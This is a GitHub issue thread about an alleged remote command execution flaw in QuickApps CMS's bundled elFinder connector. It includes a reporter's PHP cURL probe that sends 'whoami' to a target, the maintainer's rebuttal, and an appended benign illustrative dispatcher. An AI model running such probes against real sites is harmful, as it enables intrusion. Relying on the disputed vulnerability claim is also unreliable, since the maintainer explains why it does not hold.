quickapps / cms

Modular CMS powered by CakePHP
GNU General Public License v3.0

Command Execution can allow attacker to execute remote command #201

Closed FStac closed 5 years ago

FStac commented 5 years ago
plugins/MediaManager/src/Lib/ElFinder/connector.minimal.php
line 53:
$src = $_POST : $_GET;
line 64:
$cmd = $src['cmd'] : '';
line 103:
elFinder->exec($cmd, $this->input_filter($args));

Even using input_filter() to filter $src at line 150 with magic_quotes_gpc, str_replace and stripslashes, it can still be bypassed; $src can still allow an attacker to input a command to execute.

TEST PAYLOAD:

<?php
$target = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/F:wampwwwcms-2.0pluginsMediaManagersrcLibElFinderelFinderConnector.class.php?x=whoami");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
botchris commented 5 years ago

File connector.minimal.php is not used as part of QACMS, it is just there as part of the vendor package. And as far as I know, elFinder::exec() is aimed to "execute" elFinder's API commands and not O.S. commands, so I don't get what you mean by "execute remote command".

On the other hand, the test payload using cURL directly against a PHP class file is not even possible in QACMS, so I don't get what this proves.

Similar to: https://github.com/Studio-42/elFinder/issues/1018
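The distinction the maintainer draws above (an API command name selecting one of the connector's own handlers, versus a string handed to the operating system) can be illustrated with a small connector-style dispatcher. This is an added example, not elFinder's or QuickApps' code; the `MiniConnector` class, its command table and the request array are hypothetical and constructed for illustration, and it assumes PHP 7.4 or later.

```php
<?php
// Added illustration, not elFinder's or QuickApps' code: a minimal
// connector-style dispatcher in the spirit of elFinder::exec().
// The "cmd" request parameter is only ever used as a key into a fixed
// table of the connector's OWN handlers; it is never passed to a shell,
// so a probe such as cmd=whoami is answered with an error, not executed.

final class MiniConnector
{
    /** @var array<string, callable> fixed table of API commands (hypothetical) */
    private array $commands;

    public function __construct()
    {
        $this->commands = [
            'open' => fn(array $args): array => ['cwd' => $args['target'] ?? '/'],
            'ls'   => fn(array $args): array => ['list' => ['a.txt', 'b.png']],
        ];
    }

    /** Sanitise request arguments the way the issue describes: stripslashes and drop NUL bytes. */
    public function inputFilter(array $args): array
    {
        $clean = [];
        foreach ($args as $k => $v) {
            $clean[$k] = is_array($v)
                ? $this->inputFilter($v)
                : str_replace("\0", '', stripslashes((string) $v));
        }
        return $clean;
    }

    /** Dispatch by table lookup: an unknown command name is reported, never run. */
    public function exec(string $cmd, array $args): array
    {
        if (!isset($this->commands[$cmd])) {
            return ['error' => 'errUnknownCmd', 'cmd' => $cmd];
        }
        return ($this->commands[$cmd])($this->inputFilter($args));
    }
}

// Constructed request mirroring a "cmd=whoami" probe; no real HTTP involved.
$src  = ['cmd' => 'whoami', 'target' => 'l1_Lw'];
$cmd  = $src['cmd'] ?? '';
$args = array_diff_key($src, ['cmd' => true]);

$connector = new MiniConnector();
echo json_encode($connector->exec($cmd, $args)), PHP_EOL;  // rejected: unknown command
echo json_encode($connector->exec('ls', $args)), PHP_EOL;  // a real API command runs
```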